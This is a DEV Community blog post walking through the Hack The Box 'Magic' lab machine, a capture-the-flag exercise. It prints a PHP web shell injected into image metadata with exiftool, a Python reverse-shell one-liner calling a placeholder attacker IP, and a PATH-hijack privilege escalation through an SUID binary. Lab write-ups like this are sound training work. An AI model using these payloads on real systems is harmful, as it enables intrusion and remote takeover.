DEV Community

Kumar Ashwin
Kumar Ashwin

Posted on • Updated on

Learning the CTF way! : 1/n

This CTF Learn Series, will be tips and tricks I learned during CTFs.

So, that being said, today I pwned my first Hack The Box machine - Magic!

Thanks to Fahmi's Magic Walkthrough!

So, I was presented with a webserver with 2 ports in use. Started to do recon on the website and found a login panel - bypassed the login using simple SQL injection.

An image upload interface greeted me, and is ready to accept png, jpg and gif formats ONLY. There was a chance to get access using a php-reverse-shell but no, it did not accept any .php format or even I tried .php.png, bad luck! This was the time for me to learn this first trick

How to implement reverse shell inside an image?

  • Using this tool - exiftool - we can view the metadata of an image and we could use the same to alter it as well.
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']);?>' image.png

What this command does is, it alters the Comment parameter of the image.

Exiftool Output

As we have used, $_GET we could send the data through the url in cmd parameter ...image.php.png?cmd=<any shell command> and this will run the shell commands and give the output in the browser.

Checked if python is available or not, it was not but python3 was!

Then used the python one liner reverse shell to get access to the shell. Passed the one liner through cmd parameter and started listening on some port nc -nlvp 1234.

Python One Liner Reverse Shell:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Did a bit recon as www-data, found credentials of mysql database which lead to mysqldump of user's credentials.

Next step was privilege escalation to root!

Ran linpeas.sh and found out some SUID binaries, and one specific that looked interesting was sysinfo which was linked to lshw.
Time for the next lesson!

How to escalate using PATH variable and SUID?

After doing some recon, we knew that when sysinfo was running a service called lshw and therefore if we could run same command before sysinfo, we could possibly achieve our task.

Created a new file in /tmp/cardinal/lshw and put that python reverse shell in it and made it executable.

What we have to do now, is that specify this location in the PATH variable.

export PATH=/tmp/cardinal/:$PATH

And then we came to our terminal and started the reverse shell and then in the user's terminal executed sysinfo.

Viola!

Top comments (2)

Collapse
 
pr0way profile image
Tpk

Hi, thanks for article, correct first block of code "<?php eho" ;)

Collapse
 
krashwin profile image
Kumar Ashwin

Oops, thanks ya!!